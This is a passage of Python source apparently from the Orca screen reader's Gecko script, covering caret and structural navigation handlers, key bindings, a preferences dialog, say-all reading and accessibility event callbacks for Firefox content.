# track of the object which is associated with the mouse over
# so that we can restore focus to it if need be.
#
self.lastMouseOverObject = None
self.preMouseOverContext = [None, -1]
self.inMouseOverObject = False
# See bug 665522 - comment 5
app.setCacheMask(pyatspi.cache.DEFAULT ^ pyatspi.cache.CHILDREN)
def getBookmarks(self):
"""Returns the "bookmarks" class for this script.
"""
try:
return self.bookmarks
except AttributeError:
self.bookmarks = GeckoBookmarks(self)
return self.bookmarks
def getBrailleGenerator(self):
"""Returns the braille generator for this script.
"""
return BrailleGenerator(self)
def getSpeechGenerator(self):
"""Returns the speech generator for this script.
"""
return SpeechGenerator(self)
def getFormatting(self):
"""Returns the formatting strings for this script."""
return Formatting(self)
def getUtilities(self):
"""Returns the utilites for this script."""
return Utilities(self)
def getEnabledStructuralNavigationTypes(self):
"""Returns a list of the structural navigation object types
enabled in this script.
"""
enabledTypes = [GeckoStructuralNavigation.ANCHOR,
GeckoStructuralNavigation.BLOCKQUOTE,
GeckoStructuralNavigation.BUTTON,
GeckoStructuralNavigation.CHECK_BOX,
GeckoStructuralNavigation.CHUNK,
GeckoStructuralNavigation.COMBO_BOX,
GeckoStructuralNavigation.ENTRY,
GeckoStructuralNavigation.FORM_FIELD,
GeckoStructuralNavigation.HEADING,
GeckoStructuralNavigation.LANDMARK,
GeckoStructuralNavigation.LINK,
GeckoStructuralNavigation.LIST,
GeckoStructuralNavigation.LIST_ITEM,
GeckoStructuralNavigation.LIVE_REGION,
GeckoStructuralNavigation.PARAGRAPH,
GeckoStructuralNavigation.RADIO_BUTTON,
GeckoStructuralNavigation.SEPARATOR,
GeckoStructuralNavigation.TABLE,
GeckoStructuralNavigation.TABLE_CELL,
GeckoStructuralNavigation.UNVISITED_LINK,
GeckoStructuralNavigation.VISITED_LINK]
return enabledTypes
def getStructuralNavigation(self):
"""Returns the 'structural navigation' class for this script.
"""
types = self.getEnabledStructuralNavigationTypes()
enable = script_settings.structuralNavigationEnabled
return GeckoStructuralNavigation(self, types, enable)
def setupInputEventHandlers(self):
"""Defines InputEventHandler fields for this script that can be
called by the key and braille bindings.
"""
default.Script.setupInputEventHandlers(self)
self.inputEventHandlers.update(\
self.structuralNavigation.inputEventHandlers)
self.inputEventHandlers["goNextCharacterHandler"] = \
input_event.InputEventHandler(
Script.goNextCharacter,
cmdnames.CARET_NAVIGATION_NEXT_CHAR)
self.inputEventHandlers["goPreviousCharacterHandler"] = \
input_event.InputEventHandler(
Script.goPreviousCharacter,
cmdnames.CARET_NAVIGATION_PREV_CHAR)
self.inputEventHandlers["goNextWordHandler"] = \
input_event.InputEventHandler(
Script.goNextWord,
cmdnames.CARET_NAVIGATION_NEXT_WORD)
self.inputEventHandlers["goPreviousWordHandler"] = \
input_event.InputEventHandler(
Script.goPreviousWord,
cmdnames.CARET_NAVIGATION_PREV_WORD)
self.inputEventHandlers["goNextLineHandler"] = \
input_event.InputEventHandler(
Script.goNextLine,
cmdnames.CARET_NAVIGATION_NEXT_LINE)
self.inputEventHandlers["goPreviousLineHandler"] = \
input_event.InputEventHandler(
Script.goPreviousLine,
cmdnames.CARET_NAVIGATION_PREV_LINE)
self.inputEventHandlers["goTopOfFileHandler"] = \
input_event.InputEventHandler(
Script.goTopOfFile,
cmdnames.CARET_NAVIGATION_FILE_START)
self.inputEventHandlers["goBottomOfFileHandler"] = \
input_event.InputEventHandler(
Script.goBottomOfFile,
cmdnames.CARET_NAVIGATION_FILE_END)
self.inputEventHandlers["goBeginningOfLineHandler"] = \
input_event.InputEventHandler(
Script.goBeginningOfLine,
cmdnames.CARET_NAVIGATION_LINE_START)
self.inputEventHandlers["goEndOfLineHandler"] = \
input_event.InputEventHandler(
Script.goEndOfLine,
cmdnames.CARET_NAVIGATION_LINE_END)
self.inputEventHandlers["expandComboBoxHandler"] = \
input_event.InputEventHandler(
Script.expandComboBox,
cmdnames.CARET_NAVIGATION_EXPAND_COMBO_BOX)
self.inputEventHandlers["advanceLivePoliteness"] = \
input_event.InputEventHandler(
Script.advanceLivePoliteness,
cmdnames.LIVE_REGIONS_ADVANCE_POLITENESS)
self.inputEventHandlers["setLivePolitenessOff"] = \
input_event.InputEventHandler(
Script.setLivePolitenessOff,
cmdnames.LIVE_REGIONS_SET_POLITENESS_OFF)
self.inputEventHandlers["monitorLiveRegions"] = \
input_event.InputEventHandler(
Script.monitorLiveRegions,
cmdnames.LIVE_REGIONS_MONITOR)
self.inputEventHandlers["reviewLiveAnnouncement"] = \
input_event.InputEventHandler(
Script.reviewLiveAnnouncement,
cmdnames.LIVE_REGIONS_REVIEW)
self.inputEventHandlers["goPreviousObjectInOrderHandler"] = \
input_event.InputEventHandler(
Script.goPreviousObjectInOrder,
cmdnames.CARET_NAVIGATION_PREV_OBJECT)
self.inputEventHandlers["goNextObjectInOrderHandler"] = \
input_event.InputEventHandler(
Script.goNextObjectInOrder,
cmdnames.CARET_NAVIGATION_NEXT_OBJECT)
self.inputEventHandlers["toggleCaretNavigationHandler"] = \
input_event.InputEventHandler(
Script.toggleCaretNavigation,
cmdnames.CARET_NAVIGATION_TOGGLE)
self.inputEventHandlers["sayAllHandler"] = \
input_event.InputEventHandler(
Script.sayAll,
cmdnames.SAY_ALL)
self.inputEventHandlers["panBrailleLeftHandler"] = \
input_event.InputEventHandler(
Script.panBrailleLeft,
cmdnames.PAN_BRAILLE_LEFT,
False) # Do not enable learn mode for this action
self.inputEventHandlers["panBrailleRightHandler"] = \
input_event.InputEventHandler(
Script.panBrailleRight,
cmdnames.PAN_BRAILLE_RIGHT,
False) # Do not enable learn mode for this action
self.inputEventHandlers["moveToMouseOverHandler"] = \
input_event.InputEventHandler(
Script.moveToMouseOver,
cmdnames.MOUSE_OVER_MOVE)
def __getArrowBindings(self):
"""Returns an instance of keybindings.KeyBindings that use the
arrow keys for navigating HTML content.
"""
keyBindings = keybindings.KeyBindings()
keyBindings.load(keymaps.arrowKeymap, self.inputEventHandlers)
return keyBindings
def getToolkitKeyBindings(self):
"""Returns the toolkit-specific keybindings for this script."""
keyBindings = keybindings.KeyBindings()
keyBindings.load(keymaps.commonKeymap, self.inputEventHandlers)
if _settingsManager.getSetting('keyboardLayout') == \
orca.settings.GENERAL_KEYBOARD_LAYOUT_DESKTOP:
keyBindings.load(keymaps.desktopKeymap, self.inputEventHandlers)
else:
keyBindings.load(keymaps.laptopKeymap, self.inputEventHandlers)
if script_settings.controlCaretNavigation:
for keyBinding in self.__getArrowBindings().keyBindings:
keyBindings.add(keyBinding)
bindings = self.structuralNavigation.keyBindings
for keyBinding in bindings.keyBindings:
keyBindings.add(keyBinding)
return keyBindings
def getAppPreferencesGUI(self):
"""Return a GtkGrid containing the application unique configuration
GUI items for the current application."""
grid = Gtk.Grid()
grid.set_border_width(12)
generalFrame = Gtk.Frame()
grid.attach(generalFrame, 0, 0, 1, 1)
label = Gtk.Label(label="<b>%s</b>" % guilabels.PAGE_NAVIGATION)
label.set_use_markup(True)
generalFrame.set_label_widget(label)
generalAlignment = Gtk.Alignment.new(0.5, 0.5, 1, 1)
generalAlignment.set_padding(0, 0, 12, 0)
generalFrame.add(generalAlignment)
generalGrid = Gtk.Grid()
generalAlignment.add(generalGrid)
label = guilabels.USE_CARET_NAVIGATION
value = script_settings.controlCaretNavigation
self.controlCaretNavigationCheckButton = \
Gtk.CheckButton.new_with_mnemonic(label)
self.controlCaretNavigationCheckButton.set_active(value)
generalGrid.attach(self.controlCaretNavigationCheckButton, 0, 0, 1, 1)
label = guilabels.USE_STRUCTURAL_NAVIGATION
value = self.structuralNavigation.enabled
self.structuralNavigationCheckButton = \
Gtk.CheckButton.new_with_mnemonic(label)
self.structuralNavigationCheckButton.set_active(value)
generalGrid.attach(self.structuralNavigationCheckButton, 0, 1, 1, 1)
label = guilabels.CARET_NAVIGATION_START_OF_LINE
value = script_settings.arrowToLineBeginning
self.arrowToLineBeginningCheckButton = \
Gtk.CheckButton.new_with_mnemonic(label)
self.arrowToLineBeginningCheckButton.set_active(value)
generalGrid.attach(self.arrowToLineBeginningCheckButton, 0, 3, 1, 1)
label = guilabels.READ_PAGE_UPON_LOAD
value = script_settings.sayAllOnLoad
self.sayAllOnLoadCheckButton = Gtk.CheckButton.new_with_mnemonic(label)
self.sayAllOnLoadCheckButton.set_active(value)
generalGrid.attach(self.sayAllOnLoadCheckButton, 0, 4, 1, 1)
tableFrame = Gtk.Frame()
grid.attach(tableFrame, 0, 1, 1, 1)
label = Gtk.Label(label="<b>%s</b>" % guilabels.TABLE_NAVIGATION)
label.set_use_markup(True)
tableFrame.set_label_widget(label)
tableAlignment = Gtk.Alignment.new(0.5, 0.5, 1, 1)
tableAlignment.set_padding(0, 0, 12, 0)
tableFrame.add(tableAlignment)
tableGrid = Gtk.Grid()
tableAlignment.add(tableGrid)
label = guilabels.TABLE_SPEAK_CELL_COORDINATES
value = _settingsManager.getSetting('speakCellCoordinates')
self.speakCellCoordinatesCheckButton = \
Gtk.CheckButton.new_with_mnemonic(label)
self.speakCellCoordinatesCheckButton.set_active(value)
tableGrid.attach(self.speakCellCoordinatesCheckButton, 0, 0, 1, 1)
label = guilabels.TABLE_SPEAK_CELL_SPANS
value = _settingsManager.getSetting('speakCellSpan')
self.speakCellSpanCheckButton = \
Gtk.CheckButton.new_with_mnemonic(label)
self.speakCellSpanCheckButton.set_active(value)
tableGrid.attach(self.speakCellSpanCheckButton, 0, 1, 1, 1)
label = guilabels.TABLE_ANNOUNCE_CELL_HEADER
value = _settingsManager.getSetting('speakCellHeaders')
self.speakCellHeadersCheckButton = \
Gtk.CheckButton.new_with_mnemonic(label)
self.speakCellHeadersCheckButton.set_active(value)
tableGrid.attach(self.speakCellHeadersCheckButton, 0, 2, 1, 1)
label = guilabels.TABLE_SKIP_BLANK_CELLS
value = _settingsManager.getSetting('skipBlankCells')
self.skipBlankCellsCheckButton = \
Gtk.CheckButton.new_with_mnemonic(label)
self.skipBlankCellsCheckButton.set_active(value)
tableGrid.attach(self.skipBlankCellsCheckButton, 0, 3, 1, 1)
findFrame = Gtk.Frame()
grid.attach(findFrame, 0, 2, 1, 1)
label = Gtk.Label(label="<b>%s</b>" % guilabels.FIND_OPTIONS)
label.set_use_markup(True)
findFrame.set_label_widget(label)
findAlignment = Gtk.Alignment.new(0.5, 0.5, 1, 1)
findAlignment.set_padding(0, 0, 12, 0)
findFrame.add(findAlignment)
findGrid = Gtk.Grid()
findAlignment.add(findGrid)
label = guilabels.FIND_SPEAK_RESULTS
value = script_settings.speakResultsDuringFind
self.speakResultsDuringFindCheckButton = \
Gtk.CheckButton.new_with_mnemonic(label)
self.speakResultsDuringFindCheckButton.set_active(value)
findGrid.attach(self.speakResultsDuringFindCheckButton, 0, 0, 1, 1)
label = guilabels.FIND_ONLY_SPEAK_CHANGED_LINES
value = script_settings.onlySpeakChangedLinesDuringFind
self.changedLinesOnlyCheckButton = \
Gtk.CheckButton.new_with_mnemonic(label)
self.changedLinesOnlyCheckButton.set_active(value)
findGrid.attach(self.changedLinesOnlyCheckButton, 0, 1, 1, 1)
hgrid = Gtk.Grid()
findGrid.attach(hgrid, 0, 2, 1, 1)
self.minimumFindLengthLabel = \
Gtk.Label(label=guilabels.FIND_MINIMUM_MATCH_LENGTH)
self.minimumFindLengthLabel.set_alignment(0, 0.5)
hgrid.attach(self.minimumFindLengthLabel, 0, 0, 1, 1)
self.minimumFindLengthAdjustment = \
Gtk.Adjustment(script_settings.minimumFindLength, 0, 20, 1)
self.minimumFindLengthSpinButton = Gtk.SpinButton()
self.minimumFindLengthSpinButton.set_adjustment(
self.minimumFindLengthAdjustment)
hgrid.attach(self.minimumFindLengthSpinButton, 1, 0, 1, 1)
self.minimumFindLengthLabel.set_mnemonic_widget(
self.minimumFindLengthSpinButton)
grid.show_all()
return grid
def setAppPreferences(self, prefs):
"""Write out the application specific preferences lines and set the
new values.
Arguments:
- prefs: file handle for application preferences.
"""
prefs.writelines("\n")
prefix = "orca.scripts.toolkits.Gecko.script_settings"
prefs.writelines("import %s\n\n" % prefix)
value = self.controlCaretNavigationCheckButton.get_active()
prefs.writelines("%s.controlCaretNavigation = %s\n" % (prefix, value))
script_settings.controlCaretNavigation = value
value = self.structuralNavigationCheckButton.get_active()
prefs.writelines("%s.structuralNavigationEnabled = %s\n" \
% (prefix, value))
script_settings.structuralNavigationEnabled = value
value = self.arrowToLineBeginningCheckButton.get_active()
prefs.writelines("%s.arrowToLineBeginning = %s\n" % (prefix, value))
script_settings.arrowToLineBeginning = value
value = self.sayAllOnLoadCheckButton.get_active()
prefs.writelines("%s.sayAllOnLoad = %s\n" % (prefix, value))
script_settings.sayAllOnLoad = value
value = self.speakResultsDuringFindCheckButton.get_active()
prefs.writelines("%s.speakResultsDuringFind = %s\n" % (prefix, value))
script_settings.speakResultsDuringFind = value
value = self.changedLinesOnlyCheckButton.get_active()
prefs.writelines("%s.onlySpeakChangedLinesDuringFind = %s\n"\
% (prefix, value))
script_settings.onlySpeakChangedLinesDuringFind = value
value = self.minimumFindLengthSpinButton.get_value()
prefs.writelines("%s.minimumFindLength = %s\n" % (prefix, value))
script_settings.minimumFindLength = value
# These structural navigation settings used to be application-
# specific preferences because at the time structural navigation
# was implemented it was part of the Gecko script. These settings
# are now part of settings.py so that other scripts can implement
# structural navigation. But until that happens, there's no need
# to move these controls/change the preferences dialog.
#
value = self.speakCellCoordinatesCheckButton.get_active()
prefs.writelines("orca.settings.speakCellCoordinates = %s\n" % value)
_settingsManager.setSetting('speakCellCoordinates', value)
value = self.speakCellSpanCheckButton.get_active()
prefs.writelines("orca.settings.speakCellSpan = %s\n" % value)
_settingsManager.setSetting('speakCellSpan', value)
value = self.speakCellHeadersCheckButton.get_active()
prefs.writelines("orca.settings.speakCellHeaders = %s\n" % value)
_settingsManager.setSetting('speakCellHeaders', value)
value = self.skipBlankCellsCheckButton.get_active()
prefs.writelines("orca.settings.skipBlankCells = %s\n" % value)
_settingsManager.setSetting('skipBlankCells', value)
def getAppState(self):
"""Returns an object that can be passed to setAppState. This
object will be use by setAppState to restore any state information
that was being maintained by the script."""
return [default.Script.getAppState(self),
self._documentFrameCaretContext]
def setAppState(self, appState):
"""Sets the application state using the given appState object.
Arguments:
- appState: an object obtained from getAppState
"""
try:
[defaultAppState,
self._documentFrameCaretContext] = appState
default.Script.setAppState(self, defaultAppState)
except:
debug.printException(debug.LEVEL_WARNING)
def consumesKeyboardEvent(self, keyboardEvent):
"""Called when a key is pressed on the keyboard.
Arguments:
- keyboardEvent: an instance of input_event.KeyboardEvent
Returns True if the event is of interest.
"""
# We need to do this here. Orca caret and structural navigation
# often result in the user being repositioned without our getting
# a corresponding AT-SPI event. Without an AT-SPI event, script.py
# won't know to dump the generator cache. See bgo#618827.
#
self.generatorCache = {}
# The reason we override this method is that we only want
# to consume keystrokes under certain conditions. For
# example, we only control the arrow keys when we're
# managing caret navigation and we're inside document content.
#
# [[[TODO: WDW - this might be broken when we're inside a
# text area that's inside document (or anything else that
# we want to allow to control its own destiny).]]]
user_bindings = None
user_bindings_map = _settingsManager.getSetting('keyBindingsMap')
if self.__module__ in user_bindings_map:
user_bindings = user_bindings_map[self.__module__]
elif "default" in user_bindings_map:
user_bindings = user_bindings_map["default"]
consumes = False
if user_bindings:
handler = user_bindings.getInputHandler(keyboardEvent)
if handler and handler.function in self._caretNavigationFunctions:
return self.useCaretNavigationModel(keyboardEvent)
elif handler \
and (handler.function in self.structuralNavigation.functions \
or handler.function in self._liveRegionFunctions):
return self.useStructuralNavigationModel()
else:
consumes = handler != None
if not consumes:
handler = self.keyBindings.getInputHandler(keyboardEvent)
if handler and handler.function in self._caretNavigationFunctions:
return self.useCaretNavigationModel(keyboardEvent)
elif handler \
and (handler.function in self.structuralNavigation.functions \
or handler.function in self._liveRegionFunctions):
return self.useStructuralNavigationModel()
else:
consumes = handler != None
return consumes
def textLines(self, obj):
"""Creates a generator that can be used to iterate over each line
of a text object, starting at the caret offset.
Arguments:
- obj: an Accessible that has a text specialization
Returns an iterator that produces elements of the form:
[SayAllContext, acss], where SayAllContext has the text to be
spoken and acss is an ACSS instance for speaking the text.
"""
# Determine the correct "say all by" mode to use.
#
sayAllStyle = _settingsManager.getSetting('sayAllStyle')
sayAllBySentence = sayAllStyle == settings.SAYALL_STYLE_SENTENCE
[obj, characterOffset] = self.getCaretContext()
if sayAllBySentence:
# Attempt to locate the start of the current sentence by
# searching to the left for a sentence terminator. If we don't
# find one, or if the "say all by" mode is not sentence, we'll
# just start the sayAll from at the beginning of this line/object.
#
text = self.utilities.queryNonEmptyText(obj)
if text:
[line, startOffset, endOffset] = \
text.getTextAtOffset(characterOffset,
pyatspi.TEXT_BOUNDARY_LINE_START)
beginAt = 0
if line.strip():
terminators = ['. ', '? ', '! ']
for terminator in terminators:
try:
index = line.rindex(terminator,
0,
characterOffset - startOffset)
if index > beginAt:
beginAt = index
except:
pass
characterOffset = startOffset + beginAt
else:
[obj, characterOffset] = \
self.findNextCaretInOrder(obj, characterOffset)
done = False
while not done:
if sayAllBySentence:
contents = self.getObjectContentsAtOffset(obj, characterOffset)
else:
contents = self.getLineContentsAtOffset(obj, characterOffset)
utterances = self.getUtterancesFromContents(contents)
clumped = self.clumpUtterances(utterances)
for i in range(len(clumped)):
[obj, startOffset, endOffset, text] = \
contents[min(i, len(contents)-1)]
[element, voice] = clumped[i]
if isinstance(element, str):
element = self.utilities.adjustForRepeats(element)
if isinstance(element, (Pause, ACSS)):
# At the moment, SayAllContext is expecting a string; not
# a Pause. For now, being conservative and catching that
# here. See bug #591351.
#
continue
yield [speechserver.SayAllContext(obj, element,
startOffset, endOffset),
voice]
obj = contents[-1][0]
characterOffset = max(0, contents[-1][2] - 1)
if sayAllBySentence:
[obj, characterOffset] = \
self.findNextCaretInOrder(obj, characterOffset)
else:
[obj, characterOffset] = \
self.findNextLine(obj, characterOffset)
done = (obj == None)
def __sayAllProgressCallback(self, context, callbackType):
if callbackType == speechserver.SayAllContext.PROGRESS:
#print "PROGRESS", context.utterance, context.currentOffset
#
# Attempt to keep the content visible on the screen as
# it is being read, but avoid links as grabFocus sometimes
# makes them disappear and sayAll to subsequently stop.
#
if context.currentOffset == 0 and \
context.obj.getRole() in [pyatspi.ROLE_HEADING,
pyatspi.ROLE_SECTION,
pyatspi.ROLE_PARAGRAPH] \
and context.obj.parent.getRole() != pyatspi.ROLE_LINK:
characterCount = context.obj.queryText().characterCount
self.setCaretPosition(context.obj, characterCount-1)
elif callbackType == speechserver.SayAllContext.INTERRUPTED:
#print "INTERRUPTED", context.utterance, context.currentOffset
try:
self.setCaretPosition(context.obj, context.currentOffset)
except:
characterCount = context.obj.queryText().characterCount
self.setCaretPosition(context.obj, characterCount-1)
self.updateBraille(context.obj)
elif callbackType == speechserver.SayAllContext.COMPLETED:
#print "COMPLETED", context.utterance, context.currentOffset
try:
self.setCaretPosition(context.obj, context.currentOffset)
except:
characterCount = context.obj.queryText().characterCount
self.setCaretPosition(context.obj, characterCount-1)
self.updateBraille(context.obj)
def presentFindResults(self, obj, offset):
"""Updates the caret context to the match indicated by obj and
offset. Then presents the results according to the user's
preferences.
Arguments:
-obj: The accessible object within the document
-offset: The offset with obj where the caret should be positioned
"""
# At some point in Firefox 3.2 we started getting detail1 values of
# -1 for the caret-moved events for unfocused content during a find.
# We don't want to base the new caret offset -- or the current line
# on this value. We should be able to count on the selection range
# instead -- across FF 3.0, 3.1, and 3.2.
#
enoughSelected = False
text = self.utilities.queryNonEmptyText(obj)
if text and text.getNSelections():
[start, end] = text.getSelection(0)
offset = max(offset, start)
if end - start >= script_settings.minimumFindLength:
enoughSelected = True
# Haing done that, update the caretContext. If the user wants
# matches spoken, we also need to if we are on the same line
# as before.
#
origObj, origOffset = self.getCaretContext()
self.setCaretContext(obj, offset)
if enoughSelected and script_settings.speakResultsDuringFind:
origExtents = self.getExtents(origObj, origOffset - 1, origOffset)
newExtents = self.getExtents(obj, offset - 1, offset)
lineChanged = not self.onSameLine(origExtents, newExtents)
# If the user starts backspacing over the text in the
# toolbar entry, he/she is indicating they want to perform
# a different search. Because madeFindAnnounement may
# be set to True, we should reset it -- but only if we
# detect the line has also changed. We're not getting
# events from the Find entry, so we have to compare
# offsets.
#
if self.utilities.isSameObject(origObj, obj) \
and (origOffset > offset) and lineChanged:
self.madeFindAnnouncement = False
if lineChanged or not self.madeFindAnnouncement or \
not script_settings.onlySpeakChangedLinesDuringFind:
self.presentLine(obj, offset)
self.madeFindAnnouncement = True
def sayAll(self, inputEvent):
"""Speaks the contents of the document beginning with the present
location. Overridden in this script because the sayAll could have
been started on an object without text (such as an image).
"""
if not self.inDocumentContent():
return default.Script.sayAll(self, inputEvent)
else:
speech.sayAll(self.textLines(orca_state.locusOfFocus),
self.__sayAllProgressCallback)
return True
def onCaretMoved(self, event):
"""Callback for object:text-caret-moved accessibility events."""
text = self.utilities.queryNonEmptyText(event.source)
if not text:
if event.source.getRole() == pyatspi.ROLE_LINK:
orca.setLocusOfFocus(event, event.source)
return
contextObj, contextOffset = self.getCaretContext()
if event.detail1 == contextOffset and event.source == contextObj:
return
obj = event.source
firstObj, firstOffset = self.findFirstCaretContext(obj, event.detail1)
if firstOffset == contextOffset and firstObj == contextObj:
return
if contextObj and contextObj.parent == firstObj:
return
if self.isAriaWidget(obj) or not self.inDocumentContent(obj):
default.Script.onCaretMoved(self, event)
return
if self.utilities.inFindToolbar():
self.presentFindResults(obj, event.detail1)
return
self.setCaretContext(obj, event.detail1)
if not script_settings.controlCaretNavigation \
or obj.getState().contains(pyatspi.STATE_EDITABLE):
orca.setLocusOfFocus(event, obj, False)
default.Script.onCaretMoved(self, event)
def onTextDeleted(self, event):
"""Called whenever text is from an an object.
Arguments:
- event: the Event
"""
self._destroyLineCache()
if not event.source.getState().contains(pyatspi.STATE_EDITABLE):
if self.inMouseOverObject:
obj = self.lastMouseOverObject
while obj and (obj != obj.parent):
if self.utilities.isSameObject(event.source, obj):
self.restorePreMouseOverContext()
break
obj = obj.parent
default.Script.onTextDeleted(self, event)
def onTextInserted(self, event):
"""Called whenever text is inserted into an object.
Arguments:
- event: the Event
"""
self._destroyLineCache()
if self.handleAsLiveRegion(event):
self.liveMngr.handleEvent(event)
return
default.Script.onTextInserted(self, event)
def _getCtrlShiftSelectionsStrings(self):
return [messages.LINE_SELECTED_DOWN,
messages.LINE_UNSELECTED_DOWN,
messages.LINE_SELECTED_UP,
messages.LINE_UNSELECTED_UP]
def onTextSelectionChanged(self, event):
"""Called when an object's text selection changes.
Arguments:
- event: the Event
"""
if self.utilities.inFindToolbar():
self.presentFindResults(event.source, -1)
return
if not self.inDocumentContent(orca_state.locusOfFocus) \
and self.inDocumentContent(event.source):
return
default.Script.onTextSelectionChanged(self, event)
def onActiveChanged(self, event):
"""Callback for object:state-changed:active accessibility events."""
if self.findCommandRun:
self.findCommandRun = False
self.find()
return
if not event.detail1:
return
role = event.source.getRole()
if role in [pyatspi.ROLE_DIALOG, pyatspi.ROLE_ALERT]:
orca.setLocusOfFocus(event, event.source)
def onBusyChanged(self, event):
"""Callback for object:state-changed:busy accessibility events."""
try:
obj = event.source
role = obj.getRole()
name = obj.name
except:
return
if role != pyatspi.ROLE_DOCUMENT_FRAME:
return
if self.isAriaWidget(obj.parent):
return
try:
focusRole = orca_state.locusOfFocus.getRole()
except:
focusRole = None
# The event is for the changing contents of the help frame as the user
# navigates from topic to topic in the list on the left. Ignore this.
if focusRole == pyatspi.ROLE_LIST_ITEM \
and not self.inDocumentContent(orca_state.locusOfFocus):
return
finishedLoading = False
if event.detail1:
self._loadingDocumentContent = True
message = messages.PAGE_LOADING_START
elif name:
message = messages.PAGE_LOADING_END_NAMED % name
finishedLoading = True
else:
message = messages.PAGE_LOADING_END
finishedLoading = True
if not _settingsManager.getSetting('onlySpeakDisplayedText'):
self.presentMessage(message)
if not finishedLoading:
return
# Store the document frame otherwise the first time it gains focus (e.g.
# the first time the user arrows off of a link into non-focusable text),
# onFocused will start chatting unnecessarily.
self._currentFrame = obj
# First try to figure out where the caret is on the newly loaded page.
# If it is on an editable object (e.g., a text entry), then present just
# that object. Otherwise, force the caret to the top of the page and
# start a SayAll from that position.
[obj, characterOffset] = self.getCaretContext()
atTop = False
if not obj:
self.clearCaretContext()
[obj, characterOffset] = self.getCaretContext()
atTop = True
if not obj:
return
if not atTop and not obj.getState().contains(pyatspi.STATE_FOCUSABLE):
self.clearCaretContext()
[obj, characterOffset] = self.getCaretContext()
if not obj:
return
# For braille, we just show the current line containing the caret. For
# speech, however, we will start a Say All operation if the caret is in
# an unfocusable area (e.g., it's not in a text entry area such as
# Google's search text entry or a link that we just returned to by
# pressing the back button). Otherwise, we'll just speak the line that
# the caret is on.
self.updateBraille(obj)
if obj.getState().contains(pyatspi.STATE_FOCUSABLE):
speech.speak(self.speechGenerator.generateSpeech(obj))
elif not script_settings.sayAllOnLoad:
self.speakContents(
self.getLineContentsAtOffset(obj, characterOffset))
elif _settingsManager.getSetting('enableSpeech'):
self.sayAll(None)
def onChildrenChanged(self, event):
"""Callback for object:children-changed accessibility events."""
if event.any_data is None:
return
if not event.type.startswith("object:children-changed:add"):
return
if self.handleAsLiveRegion(event):
self.liveMngr.handleEvent(event)
return
child = event.any_data
try:
childRole = child.getRole()
except:
return
if childRole == pyatspi.ROLE_ALERT:
orca.setLocusOfFocus(event, child)
return
if childRole == pyatspi.ROLE_DIALOG:
if self.isAriaWidget(event.source):
orca.setLocusOfFocus(event, child)
return
if self.lastMouseRoutingTime \
and 0 < time.time() - self.lastMouseRoutingTime < 1:
utterances = []
utterances.append(messages.NEW_ITEM_ADDED)
utterances.extend(
self.speechGenerator.generateSpeech(child, force=True))
speech.speak(utterances)
self.lastMouseOverObject = child
self.preMouseOverContext = self.getCaretContext()
return
default.Script.onChildrenChanged(self, event)
def onDocumentReload(self, event):
"""Callback for document:reload accessibility events."""
# We care about the main document and we'll ignore document
# events from HTML iframes.
#
if event.source.getRole() == pyatspi.ROLE_DOCUMENT_FRAME:
self._loadingDocumentContent = True
def onDocumentLoadComplete(self, event):
"""Callback for document:load-complete accessibility events."""
# We care about the main document and we'll ignore document
# events from HTML iframes.
#
if event.source.getRole() == pyatspi.ROLE_DOCUMENT_FRAME:
# Reset the live region manager.
self.liveMngr.reset()
self._loadingDocumentContent = False
self._loadingDocumentTime = time.time()
def onDocumentLoadStopped(self, event):
"""Callback for document:load-stopped accessibility events."""
# We care about the main document and we'll ignore document
# events from HTML iframes.
#
if event.source.getRole() == pyatspi.ROLE_DOCUMENT_FRAME:
self._loadingDocumentContent = False
self._loadingDocumentTime = time.time()
def onNameChanged(self, event):
"""Called whenever a property on an object changes.
Arguments:
- event: the Event
"""
if event.source.getRole() == pyatspi.ROLE_FRAME:
self.liveMngr.flushMessages()
def onFocus(self, event):
"""Callback for focus: accessibility events."""
# NOTE: This event type is deprecated and Orca should no longer use it.
# This callback remains just to handle bugs in applications and toolkits
# during the remainder of the unstable (3.11) development cycle.
role = event.source.getRole()
# Unfiled. When a context menu pops up, we seem to get a focus: event,
# but no object:state-changed:focused event from Gecko.
if role == pyatspi.ROLE_MENU:
orca.setLocusOfFocus(event, event.source)
return
# Unfiled. When the Thunderbird 'do you want to replace this file'
# attachment dialog pops up, the 'Replace' button emits a focus:
# event, but we only seem to get the object:state-changed:focused
# event when it gives up focus.
if role == pyatspi.ROLE_PUSH_BUTTON:
orca.setLocusOfFocus(event, event.source)
# Some of the dialogs used by Thunderbird (and perhaps Firefox?) seem
# to be using Gtk+ 2, along with its associated focused-event issues.
# Unfortunately, because Gtk+ 2 doesn't expose a per-object toolkit,
# we cannot know that a given widget is Gtk+ 2. Therefore, we'll put
# our Gtk+ 2 toolkit script hacks here as well just to be safe.
if role in [pyatspi.ROLE_TEXT, pyatspi.ROLE_PASSWORD_TEXT]:
orca.setLocusOfFocus(event, event.source)
def onFocusedChanged(self, event):
"""Callback for object:state-changed:focused accessibility events."""
if not event.detail1:
return
if not script_settings.controlCaretNavigation:
default.Script.onFocusedChanged(self, event)
return
obj = event.source
if self.isAriaWidget(obj) or not self.inDocumentContent(obj):
default.Script.onFocusedChanged(self, event)
return
state = obj.getState()
if state.contains(pyatspi.STATE_EDITABLE):
default.Script.onFocusedChanged(self, event)
return
role = obj.getRole()
if role in [pyatspi.ROLE_DIALOG, pyatspi.ROLE_ALERT]:
orca.setLocusOfFocus(event, event.source)
return
# As the caret moves into a non-focusable element, Gecko emits the
# signal on the first focusable element in the ancestry.
rolesToIgnore = pyatspi.ROLE_DOCUMENT_FRAME, pyatspi.ROLE_PANEL
if role in rolesToIgnore:
if self.inDocumentContent():
return
contextObj, contextOffset = self.getCaretContext()
if contextObj:
orca.setLocusOfFocus(event, contextObj)
return
default.Script.onFocusedChanged(self, event)
def onShowingChanged(self, event):
"""Callback for object:state-changed:showing accessibility events."""
# TODO - JD: Once there are separate scripts for the Gecko toolkit
# and the Firefox browser, the stuff below belongs in the browser
# script and not in the toolkit script.
try:
eventRole = event.source.getRole()
focusedRole = orca_state.locusOfFocus.getRole()
except:
default.Script.onShowingChanged(self, event)
return
# If an autocomplete appears beneath an entry, we don't want
# to prevent the user from being able to arrow into it.
if eventRole == pyatspi.ROLE_WINDOW \
and focusedRole in [pyatspi.ROLE_ENTRY, pyatspi.ROLE_LIST_ITEM]:
self._autocompleteVisible = event.detail1
# If the autocomplete has just appeared, we want to speak
# its appearance if the user's verbosity level is verbose
# or if the user forced it to appear with (Alt+)Down Arrow.
if self._autocompleteVisible:
level = _settingsManager.getSetting('speechVerbosityLevel')
speakIt = level == settings.VERBOSITY_LEVEL_VERBOSE
if not speakIt:
eventString, mods = self.utilities.lastKeyAndModifiers()
speakIt = eventString == "Down"
if speakIt:
